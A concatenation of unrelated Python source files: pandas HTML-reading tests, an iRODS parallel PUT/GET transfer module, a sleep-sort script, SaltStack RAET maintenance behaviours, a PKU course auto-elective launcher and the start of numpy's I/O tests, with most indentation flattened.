@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath("io", "data", "html", "banklist.html")
self.read_html(banklist_data, match=".*Water.*", flavor=["lxml", "html5lib"])
def test_to_html_timestamp(self):
rng = date_range("2000-01-01", periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert "2000-01-01" in result
@pytest.mark.parametrize(
"displayed_only,exp0,exp1",
[
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])),
],
)
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO(
"""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>"""
)
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
@pytest.mark.filterwarnings(
"ignore:You provided Unicode markup but also provided a value for "
"from_encoding.*:UserWarning"
)
def test_encode(self, html_encoding_file):
base_path = os.path.basename(html_encoding_file)
root = os.path.splitext(base_path)[0]
_, encoding = root.split("_")
try:
with open(html_encoding_file, "rb") as fobj:
from_string = self.read_html(
fobj.read(), encoding=encoding, index_col=0
).pop()
with open(html_encoding_file, "rb") as fobj:
from_file_like = self.read_html(
BytesIO(fobj.read()), encoding=encoding, index_col=0
).pop()
from_filename = self.read_html(
html_encoding_file, encoding=encoding, index_col=0
).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if "16" in encoding or "32" in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get("flavor") == "lxml":
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO(
"""
<table><tr><td>spam<foobr />eggs</td></tr></table>"""
)
assert self.read_html(bad)
with pytest.raises(ValueError, match="passed a non-rewindable file object"):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile:
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = "" if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
def __iter__(self):
# to fool `is_file_like`, should never end up here
assert False
good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>")
bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>")
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super().run()
except Exception as err:
self.err = err
else:
self.err = None
        # force import check by reinitialising global vars in html.py
reload(pandas.io.html)
filename = datapath("io", "data", "html", "valid_markup.html")
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
def test_parse_path_object(self, datapath):
# GH 37705
file_path_string = datapath("io", "data", "html", "spam.html")
file_path = Path(file_path_string)
df1 = self.read_html(file_path_string)[0]
df2 = self.read_html(file_path)[0]
tm.assert_frame_equal(df1, df2)
|
parallel.py
|
#!/usr/bin/env python
from __future__ import print_function
import os
import ssl
import time
import sys
import logging
import contextlib
import concurrent.futures
import threading
import multiprocessing
import six
from irods.data_object import iRODSDataObject
from irods.exception import DataObjectDoesNotExist
import irods.keywords as kw
from six.moves.queue import Queue,Full,Empty
logger = logging.getLogger( __name__ )
_nullh = logging.NullHandler()
logger.addHandler( _nullh )
MINIMUM_SERVER_VERSION = (4,2,9)
try:
from threading import Barrier # Use 'Barrier' class if included (as in Python >= 3.2) ...
except ImportError: # ... but otherwise, use this ad hoc:
class Barrier(object):
def __init__(self, n):
"""Initialize a Barrier to wait on n threads."""
self.n = n
self.count = 0
self.mutex = threading.Semaphore(1)
self.barrier = threading.Semaphore(0)
def wait(self):
"""Per-thread wait function.
As in Python3.2 threading, returns 0 <= wait_serial_int < n
"""
self.mutex.acquire()
self.count += 1
count = self.count
self.mutex.release()
if count == self.n: self.barrier.release()
self.barrier.acquire()
self.barrier.release()
return count - 1
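# A small illustration (comments only; the thread function name is hypothetical)
# of how the ad hoc Barrier above behaves: every thread calls wait(); the first
# n-1 callers block on the second semaphore, the n-th caller releases it, and
# each waiter re-releases it on the way out so all n threads proceed together.
#
#     barrier = Barrier(3)
#     def transfer_thread():
#         ...                 # per-thread copy work
#         barrier.wait()      # all 3 threads leave wait() at roughly the same time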
@contextlib.contextmanager
def enableLogging(handlerType,args,level_ = logging.INFO):
"""Context manager for temporarily enabling a logger. For debug or test.
Usage Example -
with irods.parallel.enableLogging(logging.FileHandler,('/tmp/logfile.txt',)):
# parallel put/get code here
"""
h = None
saveLevel = logger.level
try:
logger.setLevel(level_)
h = handlerType(*args)
h.setLevel( level_ )
logger.addHandler(h)
yield
finally:
logger.setLevel(saveLevel)
if h in logger.handlers:
logger.removeHandler(h)
RECOMMENDED_NUM_THREADS_PER_TRANSFER = 3
verboseConnection = False
class BadCallbackTarget(TypeError): pass
class AsyncNotify (object):
"""A type returned when the PUT or GET operation passed includes NONBLOCKING.
If enabled, the callback function (or callable object) will be triggered
when all parts of the parallel transfer are complete. It should accept
exactly one argument, the irods.parallel.AsyncNotify instance that
is calling it.
"""
def set_transfer_done_callback( self, callback ):
if callback is not None:
if not callable(callback):
raise BadCallbackTarget( '"callback" must be a callable accepting at least 1 argument' )
self.done_callback = callback
def __init__(self, futuresList, callback = None, progress_Queue = None, total = None, keep_ = ()):
"""AsyncNotify initialization (used internally to the io.parallel library).
The casual user will only be concerned with the callback parameter, called when all threads
of the parallel PUT or GET have been terminated and the data object closed.
"""
self._futures = set(futuresList)
self._futures_done = dict()
self.keep = dict(keep_)
self._lock = threading.Lock()
self.set_transfer_done_callback (callback)
self.__done = False
if self._futures:
for future in self._futures: future.add_done_callback( self )
else:
self.__invoke_done_callback()
self.progress = [0, 0]
if (progress_Queue) and (total is not None):
self.progress[1] = total
def _progress(Q,this): # - thread to update progress indicator
while this.progress[0] < this.progress[1]:
i = None
try:
i = Q.get(timeout=0.1)
except Empty:
pass
if i is not None:
if isinstance(i,six.integer_types) and i >= 0: this.progress[0] += i
else: break
self._progress_fn = _progress
self._progress_thread = threading.Thread( target = self._progress_fn, args = (progress_Queue, self))
self._progress_thread.start()
@staticmethod
def asciiBar( lst, memo = [1] ):
memo[0] += 1
spinner = "|/-\\"[memo[0]%4]
percent = "%5.1f%%"%(lst[0]*100.0/lst[1])
mbytes = "%9.1f MB / %9.1f MB"%(lst[0]/1e6,lst[1]/1e6)
if lst[1] != 0:
s = " {spinner} {percent} [ {mbytes} ] "
else:
s = " {spinner} "
return s.format(**locals())
def wait_until_transfer_done (self, timeout=float('inf'), progressBar = False):
carriageReturn = '\r'
begin = t = time.time()
end = begin + timeout
while not self.__done:
time.sleep(min(0.1, max(0.0, end - t)))
t = time.time()
if t >= end: break
if progressBar:
print (' ' + self.asciiBar( self.progress ) + carriageReturn, end='', file=sys.stderr)
sys.stderr.flush()
return self.__done
def __call__(self,future): # Our instance is called by each future (individual file part) when done.
# When all futures are done, we invoke the configured callback.
with self._lock:
self._futures_done[future] = future.result()
if len(self._futures) == len(self._futures_done): self.__invoke_done_callback()
def __invoke_done_callback(self):
try:
if callable(self.done_callback): self.done_callback(self)
finally:
self.keep.pop('mgr',None)
self.__done = True
self.set_transfer_done_callback(None)
@property
def futures(self): return list(self._futures)
@property
def futures_done(self): return dict(self._futures_done)
class Oper(object):
"""A custom enum-type class with utility methods. """
GET = 0
PUT = 1
NONBLOCKING = 2
def __int__(self):
"""Return the stored flags as an integer bitmask. """
return self._opr
def __init__(self, rhs):
"""Initialize with a bit mask of flags ie. whether Operation PUT or GET,
and whether NONBLOCKING."""
self._opr = int(rhs)
def isPut(self): return 0 != (self._opr & self.PUT)
def isGet(self): return not self.isPut()
def isNonBlocking(self): return 0 != (self._opr & self.NONBLOCKING)
def data_object_mode(self, initial_open = False):
if self.isPut():
return 'w' if initial_open else 'a'
else:
return 'r'
def disk_file_mode(self, initial_open = False, binary = True):
if self.isPut():
mode = 'r'
else:
mode = 'w' if initial_open else 'r+'
return ((mode + 'b') if binary else mode)
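# Illustration of the Oper bitmask (comments only): flags are combined with
# bitwise-or, exactly as the __main__ block near the bottom of this module does.
#
#     op = Oper(Oper.PUT | Oper.NONBLOCKING)
#     op.isPut()               # True
#     op.isNonBlocking()       # True
#     int(op)                  # 3
#     Oper(Oper.GET).isGet()   # True (GET is the absence of the PUT bit)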
def _io_send_bytes_progress (queueObject, item):
try:
queueObject.put(item)
return True
except Full:
return False
COPY_BUF_SIZE = (1024 ** 2) * 4
def _copy_part( src, dst, length, queueObject, debug_info, mgr):
bytecount = 0
accum = 0
    while bytecount < length:
buf = src.read(min(COPY_BUF_SIZE, length - bytecount))
buf_len = len(buf)
if 0 == buf_len: break
dst.write(buf)
bytecount += buf_len
accum += buf_len
if queueObject and accum and _io_send_bytes_progress(queueObject,accum): accum = 0
if verboseConnection:
print ("("+debug_info+")",end='',file=sys.stderr)
sys.stderr.flush()
# In a put or get, exactly one of (src,dst) is a file. Find which and close that one first.
(file_,obj_) = (src,dst) if dst in mgr else (dst,src)
file_.close()
mgr.remove_io( obj_ ) # 1. closes obj if it is not the mgr's initial descriptor
# 2. blocks at barrier until all transfer threads are done copying
# 3. closes with finalize if obj is mgr's initial descriptor
return bytecount
class _Multipart_close_manager:
def __init__(self, initial_io_, exit_barrier_):
self.exit_barrier = exit_barrier_
self.initial_io = initial_io_
self.__lock = threading.Lock()
self.aux = []
def __contains__(self,Io):
with self.__lock:
return Io is self.initial_io or \
Io in self.aux
# `add_io' - add an i/o object to be managed
# note: `remove_io' should only be called for managed i/o objects
def add_io(self,Io):
with self.__lock:
if Io is not self.initial_io:
self.aux.append(Io)
# `remove_io' is for closing a channel of parallel i/o and allowing the
# data object to flush write operations (if any) in a timely fashion. It also
# synchronizes all of the parallel threads just before exit, so that we know
# exactly when to perform a finalizing close on the data object
def remove_io(self,Io):
is_initial = True
with self.__lock:
if Io is not self.initial_io:
Io.close()
self.aux.remove(Io)
is_initial = False
self.exit_barrier.wait()
if is_initial: self.finalize()
def finalize(self):
self.initial_io.close()
def _io_part (objHandle, range_, file_, opr_, mgr_, thread_debug_id = '', queueObject = None ):
if 0 == len(range_): return 0
Operation = Oper(opr_)
(offset,length) = (range_[0], len(range_))
objHandle.seek(offset)
file_.seek(offset)
if thread_debug_id == '':
thread_debug_id = str(threading.currentThread().ident)
return ( _copy_part (file_, objHandle, length, queueObject, thread_debug_id, mgr_) if Operation.isPut()
else _copy_part (objHandle, file_, length, queueObject, thread_debug_id, mgr_) )
def _io_multipart_threaded(operation_ , dataObj_and_IO, replica_token, hier_str, session, fname,
total_size, num_threads = 0, **extra_options):
"""Called by _io_main.
Carve up (0,total_size) range into `num_threads` parts and initiate a transfer thread for each one."""
(D, Io) = dataObj_and_IO
Operation = Oper( operation_ )
if num_threads < 1:
num_threads = RECOMMENDED_NUM_THREADS_PER_TRANSFER
num_threads = max(1, min(multiprocessing.cpu_count(), num_threads))
P = 1 + (total_size // num_threads)
logger.info("num_threads = %s ; (P)artitionSize = %s", num_threads, P)
ranges = [six.moves.range(i*P,min(i*P+P,total_size)) for i in range(num_threads) if i*P < total_size]
_queueLength = extra_options.get('_queueLength',0)
if _queueLength > 0:
queueObject = Queue(_queueLength)
else:
queueObject = None
futures = []
executor = concurrent.futures.ThreadPoolExecutor(max_workers = num_threads)
num_threads = min(num_threads, len(ranges))
mgr = _Multipart_close_manager(Io, Barrier(num_threads))
counter = 1
gen_file_handle = lambda: open(fname, Operation.disk_file_mode(initial_open = (counter == 1)))
File = gen_file_handle()
for r in ranges:
if Io is None:
Io = session.data_objects.open( D.path, Operation.data_object_mode(initial_open = False),
create = False, finalize_on_close = False,
**{kw.RESC_HIER_STR_KW: hier_str, kw.REPLICA_TOKEN_KW: replica_token} )
mgr.add_io( Io )
if File is None: File = gen_file_handle()
futures.append(executor.submit( _io_part, Io, r, File, Operation, mgr, str(counter), queueObject))
counter += 1
Io = File = None
if Operation.isNonBlocking():
if _queueLength:
return futures, queueObject, mgr
else:
return futures
else:
bytecounts = [ f.result() for f in futures ]
return sum(bytecounts), total_size
# io_main
# * Entry point for parallel transfers (multithreaded PUT and GET operations)
# * determine replica information
# * call multithread manager
def io_main( session, Data, opr_, fname, R='', **kwopt):
Operation = Oper(opr_)
d_path = None
Io = None
if isinstance(Data,tuple):
(Data, Io) = Data[:2]
if isinstance (Data, six.string_types):
d_path = Data
try:
Data = session.data_objects.get( Data )
d_path = Data.path
except DataObjectDoesNotExist:
if Operation.isGet(): raise
R_via_libcall = kwopt.pop( 'target_resource_name', '')
if R_via_libcall:
R = R_via_libcall
resc_options = {}
if Operation.isPut():
if R:
resc_options [kw.RESC_NAME_KW] = R
resc_options [kw.DEST_RESC_NAME_KW] = R
if (not Io):
(Io, rawfile) = session.data_objects.open_with_FileRaw( (d_path or Data.path),
Operation.data_object_mode(initial_open = True),
finalize_on_close = True, **resc_options )
else:
rawfile = Io.raw
# data object should now exist
if not isinstance(Data,iRODSDataObject):
Data = session.data_objects.get(d_path)
if Operation.isGet():
total_bytes = Io.seek(0,os.SEEK_END)
Io.seek(0,os.SEEK_SET)
else:
with open(fname, 'rb') as f:
f.seek(0,os.SEEK_END)
total_bytes = f.tell()
(replica_token , resc_hier) = rawfile.replica_access_info()
num_threads = kwopt.pop( 'num_threads', None)
if num_threads is None: num_threads = int(kwopt.get('N','0'))
queueLength = kwopt.get('queueLength',0)
retval = _io_multipart_threaded (Operation, (Data, Io), replica_token, resc_hier, session, fname, total_bytes,
num_threads = num_threads,
_queueLength = queueLength)
# SessionObject.data_objects.parallel_{put,get} will return:
# - immediately with an AsyncNotify instance, if Oper.NONBLOCKING flag is used.
# - upon completion with a boolean completion status, otherwise.
if Operation.isNonBlocking():
if queueLength > 0:
(futures, chunk_notify_queue, mgr) = retval
else:
futures = retval
chunk_notify_queue = total_bytes = None
return AsyncNotify( futures, # individual futures, one per transfer thread
progress_Queue = chunk_notify_queue, # for notifying the progress indicator thread
total = total_bytes, # total number of bytes for parallel transfer
keep_ = {'mgr': mgr} ) # an open raw i/o object needing to be persisted, if any
else:
(_bytes_transferred, _bytes_total) = retval
return (_bytes_transferred == _bytes_total)
if __name__ == '__main__':
import getopt
import atexit
from irods.session import iRODSSession
def setupLoggingWithDateTimeHeader(name,level = logging.DEBUG):
if _nullh in logger.handlers:
logger.removeHandler(_nullh)
if name:
handler = logging.FileHandler(name)
else:
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)-15s - %(message)s'))
logger.addHandler(handler)
logger.setLevel( level )
try:
env_file = os.environ['IRODS_ENVIRONMENT_FILE']
except KeyError:
env_file = os.path.expanduser('~/.irods/irods_environment.json')
ssl_context = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH, cafile=None, capath=None, cadata=None)
ssl_settings = {'ssl_context': ssl_context}
sess = iRODSSession(irods_env_file=env_file, **ssl_settings)
atexit.register(lambda : sess.cleanup())
opt,arg = getopt.getopt( sys.argv[1:], 'vL:l:aR:N:')
opts = dict(opt)
logFilename = opts.pop('-L',None) # '' for console, non-empty for filesystem destination
logLevel = (logging.INFO if logFilename is None else logging.DEBUG)
logFilename = logFilename or opts.pop('-l',None)
if logFilename is not None:
setupLoggingWithDateTimeHeader(logFilename, logLevel)
verboseConnection = (opts.pop('-v',None) is not None)
async_xfer = opts.pop('-a',None)
kwarg = { k.lstrip('-'):v for k,v in opts.items() }
arg[1] = Oper.PUT if arg[1].lower() in ('w','put','a') \
else Oper.GET
if async_xfer is not None:
arg[1] |= Oper.NONBLOCKING
ret = io_main(sess, *arg, **kwarg) # arg[0] = data object or path
# arg[1] = operation: or'd flags : [PUT|GET] NONBLOCKING
# arg[2] = file path on local filesystem
# kwarg['queueLength'] sets progress-queue length (0 if no progress indication needed)
# kwarg options 'N' (num threads) and 'R' (target resource name) are via command-line
# kwarg['num_threads'] (overrides 'N' when called as a library)
# kwarg['target_resource_name'] (overrides 'R' when called as a library)
if isinstance( ret, AsyncNotify ):
print('waiting on completion...',file=sys.stderr)
ret.set_transfer_done_callback(lambda r: print('Async transfer done for:',r,file=sys.stderr))
done = ret.wait_until_transfer_done (timeout=10.0) # - or do other useful work here
if done:
bytes_transferred = sum(ret.futures_done.values())
            print ('Async transfer complete. Total bytes transferred:', bytes_transferred,file=sys.stderr)
        else:
            print ('Async transfer was not completed before timeout expired.',file=sys.stderr)
else:
print('Synchronous transfer {}'.format('succeeded' if ret else 'failed'),file=sys.stderr)
# Note : This module requires concurrent.futures, included in Python3.x.
# On Python2.7, this dependency must be installed using 'pip install futures'.
# Demonstration :
#
# $ dd if=/dev/urandom bs=1k count=150000 of=$HOME/puttest
# $ time python -m irods.parallel -R demoResc -N 3 `ipwd`/test.dat put $HOME/puttest # add -v,-a for verbose, asynch
# $ time python -m irods.parallel -R demoResc -N 3 `ipwd`/test.dat get $HOME/gettest # add -v,-a for verbose, asynch
# $ diff puttest gettest
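#
# Library-call sketch (paths and resource name are hypothetical; assumes an
# established iRODSSession `sess`) mirroring the command-line demo above:
#
#     from irods.parallel import io_main, Oper
#     ok = io_main(sess, '/tempZone/home/rods/test.dat', Oper.PUT,
#                  '/home/user/puttest', num_threads=3,
#                  target_resource_name='demoResc')
#     # ok is True when all bytes were transferred; passing
#     # Oper.PUT | Oper.NONBLOCKING instead returns an AsyncNotify object.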
|
sleep-sort.py
|
import threading
import sys
from time import sleep
sort_list = []
def validate_list():
for num in sys.argv:
try:
sort_list.append(int(num))
except ValueError:
pass
def sleep_sort(n):
sleep(n)
print(n, end=", ")
def main():
validate_list()
for num in sort_list:
threading.Thread(target=sleep_sort, args=(num, )).start()
main()
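# Usage sketch (argument values are illustrative): running
#
#     python sleep-sort.py 3 1 2
#
# starts one thread per integer; each thread sleeps for its value in seconds
# and then prints it, producing "1, 2, 3, " after roughly 3 seconds.
# Non-integer arguments (including the script name in sys.argv[0]) are
# silently skipped by validate_list().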
|
maint.py
|
# -*- coding: utf-8 -*-
'''
Define the behaviors used in the maintenance process
'''
# Import python libs
import multiprocessing
import os
# Import ioflo libs
import ioflo.app.run  # needed below for ioflo.app.run.start()
import ioflo.base.deeding
# Import salt libs
import salt.fileserver
import salt.loader
import salt.utils.minions
import salt.daemons.masterapi
class SaltRaetMaintFork(ioflo.base.deeding.Deed):
'''
    Fork off the maintenance process from the master router process
FloScript:
do salt raet maint fork at enter
'''
Ioinits = {'opts': '.salt.opts'}
def _fork_maint(self):
'''
        Use multiprocessing here to fork the maintenance process
'''
proc = multiprocessing.Process(target=self._maint)
proc.start()
def _maint(self):
'''
        Spin up a worker; do this in a separate process
'''
behaviors = ['salt.daemons.flo']
preloads = [('.salt.opts', dict(value=self.opts.value))]
console_logdir = self.opts.value.get('ioflo_console_logdir', '')
if console_logdir:
consolepath = os.path.join(console_logdir, 'maintenance.log')
else: # empty means log to std out
consolepath = ''
ioflo.app.run.start(
name='maintenance',
period=float(self.opts.value['loop_interval']),
stamp=0.0,
real=self.opts.value['ioflo_realtime'],
filepath=self.opts.value['maintenance_floscript'],
behaviors=behaviors,
username="",
password="",
mode=None,
houses=None,
metas=None,
preloads=preloads,
verbose=int(self.opts.value['ioflo_verbose']),
consolepath=consolepath,
)
def action(self):
'''
make go!
'''
self._fork_maint()
class SaltRaetMaintSetup(ioflo.base.deeding.Deed):
'''
Init loader objects used
FloScript:
do salt raet maint setup at enter
'''
Ioinits = {'opts': '.salt.opts',
'fileserver': '.salt.loader.fileserver',
'runners': '.salt.loader.runners',
'pillargitfs': '.salt.loader.pillargitfs',
'ckminions': '.salt.loader.ckminions'}
def action(self):
'''
Set up the objects used in the maint process
'''
self.fileserver.value = salt.fileserver.Fileserver(self.opts.value)
self.runners.value = salt.loader.runner(self.opts.value)
self.ckminions.value = salt.utils.minions.CkMinions(self.opts.value)
self.pillargitfs.value = salt.daemons.masterapi.init_git_pillar(
self.opts.value)
class SaltRaetMainFileserverClean(ioflo.base.deeding.Deed):
'''
Clear the fileserver backend caches
FloScript:
do salt raet maint fileserver clean at enter
'''
Ioinits = {'opts': '.salt.opts'}
def action(self):
'''
Clean!
'''
salt.daemons.masterapi.clean_fsbackend(self.opts.value)
class SaltRaetMainOldJobsClear(ioflo.base.deeding.Deed):
'''
Iterate over the jobs directory and clean out the old jobs
FloScript:
do salt raet maint old jobs clear
'''
Ioinits = {'opts': '.salt.opts'}
def action(self):
'''
Clear out the old jobs cache
'''
salt.daemons.masterapi.clean_old_jobs(self.opts.value)
class SaltRaetMainBackendsUpdate(ioflo.base.deeding.Deed):
'''
Update the fileserver and external pillar caches
FloScript:
do salt raet maint backends update
'''
Ioinits = {'opts': '.salt.opts',
'fileserver': '.salt.loader.fileserver',
'pillargitfs': '.salt.loader.pillargitfs'}
def action(self):
'''
Update!
'''
for pillargit in self.pillargitfs.value:
pillargit.update()
salt.daemons.masterapi.fileserver_update(self.fileserver.value)
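# Sketch of how these deeds could be wired together in a maintenance floscript
# (the "do ..." lines come from the FloScript hints in the docstrings above;
# ordering and scheduling here are illustrative only):
#
#     do salt raet maint setup at enter
#     do salt raet maint fileserver clean at enter
#     do salt raet maint old jobs clear
#     do salt raet maint backends update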
|
main.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# filename: main.py
# modified: 2019-09-11
import os
import time
from optparse import OptionParser
from multiprocessing import Process, Manager, Queue
from autoelective import __version__, __date__
def task_run_loop():
from autoelective.loop import main as run_main_loop
from autoelective.logger import ConsoleLogger
from autoelective.const import SIGNAL_KILL_ALL_PROCESSES
cout = ConsoleLogger("main")
signals = Queue()
p = Process(target=run_main_loop, name="Main", args=(signals,))
p.daemon = True
p.start()
while True:
try:
signal = signals.get() # block process
except KeyboardInterrupt as e:
cout.info("Process %s is killed" % os.getpid())
return
        time.sleep(0.1)  # brief pause before handling the signal
if signal == SIGNAL_KILL_ALL_PROCESSES:
if p.is_alive():
p.terminate()
cout.info("Process %s is killed" % p.name)
break
def task_run_loop_with_monitor():
from autoelective.parser import load_course_csv
from autoelective.loop import main as run_main_loop
from autoelective.monitor import main as run_monitor
from autoelective.logger import ConsoleLogger
from autoelective.const import SIGNAL_KILL_ALL_PROCESSES
cout = ConsoleLogger("main")
signals = Queue()
with Manager() as manager:
# shared objects
goals = manager.list(load_course_csv())
ignored = manager.list()
status = manager.dict()
status["main_loop"] = 0
status["login_loop"] = 0
status["error_count"] = 0
status["errors"] = manager.dict()
pList = [
Process(target=run_main_loop, name="Main", args=(signals, goals, ignored, status)),
Process(target=run_monitor, name="Monitor", args=(signals, goals, ignored, status)),
]
for p in pList:
p.daemon = True
p.start()
while True:
try:
signal = signals.get() # block process
except KeyboardInterrupt as e:
cout.info("Process %s is killed" % os.getpid())
return
            time.sleep(0.1)  # brief pause before handling the signal
if signal == SIGNAL_KILL_ALL_PROCESSES:
for p in pList:
if p.is_alive():
p.terminate()
cout.info("Process %s is killed" % p.name)
break
def main():
parser = OptionParser(
description='PKU Auto-Elective Tool v%s (%s)' % (__version__, __date__),
version=__version__,
)
# MARK: custom input files
parser.add_option(
'--config',
dest='CONFIG_INI',
metavar="FILE",
help='custom config file encoded with utf8',
)
parser.add_option(
'--course-csv-utf8',
dest='COURSE_UTF8_CSV',
metavar="FILE",
help='custom course.csv file encoded with utf8',
)
parser.add_option(
'--course-csv-gbk',
dest='COURSE_GBK_CSV',
metavar="FILE",
help='custom course.csv file encoded with gbk',
)
# MARK: boolean (flag) options
parser.add_option(
'--with-monitor',
dest='with_monitor',
action='store_true',
default=False,
help='run the monitor process simultaneously',
)
options, args = parser.parse_args()
run_task = task_run_loop
# MARK: setup custom const
import autoelective.const as const
if options.CONFIG_INI is not None:
const.CONFIG_INI = options.CONFIG_INI
if options.COURSE_UTF8_CSV is not None:
const.COURSE_UTF8_CSV = options.COURSE_UTF8_CSV
if options.COURSE_GBK_CSV is not None:
const.COURSE_GBK_CSV = options.COURSE_GBK_CSV
    # MARK: handle boolean (flag) options
if options.with_monitor:
run_task = task_run_loop_with_monitor
run_task()
if __name__ == '__main__':
main()
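# Invocation sketch (file names are illustrative):
#
#     python3 main.py --config config.ini --with-monitor
#
# runs the elective loop together with the monitor process; omit
# --with-monitor to run only the main loop (task_run_loop).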
|
test_io.py
|
import sys
import gc
import gzip
import os
import threading
import time
import warnings
import io
import re
import pytest
from pathlib import Path
from tempfile import NamedTemporaryFile
from io import BytesIO, StringIO
from datetime import datetime
import locale
from multiprocessing import Process, Value
from ctypes import c_bool
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import ConverterError, ConversionWarning
from numpy.compat import asbytes
from numpy.ma.testutils import assert_equal
from numpy.testing import (
assert_warns, assert_, assert_raises_regex, assert_raises,
assert_allclose, assert_array_equal, temppath, tempdir, IS_PYPY,
HAS_REFCOUNT, suppress_warnings, assert_no_gc_cycles, assert_no_warnings,
break_cycles
)
from numpy.testing._private.utils import requires_memory
class TextIO(BytesIO):
"""Helper IO class.
Writes encode strings to bytes if needed, reads return bytes.
This makes it easier to emulate files opened in binary mode
without needing to explicitly convert strings to bytes in
setting up the test data.
"""
def __init__(self, s=""):
BytesIO.__init__(self, asbytes(s))
def write(self, s):
BytesIO.write(self, asbytes(s))
def writelines(self, lines):
BytesIO.writelines(self, [asbytes(s) for s in lines])
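# For example, TextIO('1 2\n3 4') behaves like a binary file whose contents
# are b'1 2\n3 4', so the tests below can build text fixtures without
# converting strings to bytes by hand.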
IS_64BIT = sys.maxsize > 2**32
try:
import bz2
HAS_BZ2 = True
except ImportError:
HAS_BZ2 = False
try:
import lzma
HAS_LZMA = True
except ImportError:
HAS_LZMA = False
def strptime(s, fmt=None):
"""
This function is available in the datetime module only from Python >=
2.5.
"""
if type(s) == bytes:
s = s.decode("latin1")
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest:
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {"allow_pickle": True})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
target_file = NamedTemporaryFile(delete=False)
load_file = target_file.name
else:
target_file = BytesIO()
load_file = target_file
try:
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
finally:
if not isinstance(target_file, BytesIO):
target_file.close()
# holds an open file descriptor so it can't be deleted on win
if 'arr_reloaded' in locals():
if not isinstance(arr_reloaded, np.lib.npyio.NpzFile):
os.remove(target_file.name)
def check_roundtrips(self, a):
self.roundtrip(a)
self.roundtrip(a, file_on_disk=True)
self.roundtrip(np.asfortranarray(a))
self.roundtrip(np.asfortranarray(a), file_on_disk=True)
if a.shape[0] > 1:
# neither C nor Fortran contiguous for 2D arrays or more
self.roundtrip(np.asfortranarray(a)[1:])
self.roundtrip(np.asfortranarray(a)[1:], file_on_disk=True)
def test_array(self):
a = np.array([], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], int)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.check_roundtrips(a)
def test_array_object(self):
a = np.array([], object)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], object)
self.check_roundtrips(a)
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@pytest.mark.skipif(sys.platform == 'win32', reason="Fails on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
a = np.asfortranarray([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.check_roundtrips(a)
@pytest.mark.slow
def test_format_2_0(self):
dt = [(("%d" % i) * 100, float) for i in range(500)]
a = np.ones(1000, dtype=dt)
with warnings.catch_warnings(record=True):
warnings.filterwarnings('always', '', UserWarning)
self.check_roundtrips(a)
class TestSaveLoad(RoundtripTest):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
assert_equal(self.arr[0].dtype, self.arr_reloaded.dtype)
assert_equal(self.arr[0].flags.fnc, self.arr_reloaded.flags.fnc)
class TestSavezLoad(RoundtripTest):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
try:
for n, arr in enumerate(self.arr):
reloaded = self.arr_reloaded['arr_%d' % n]
assert_equal(arr, reloaded)
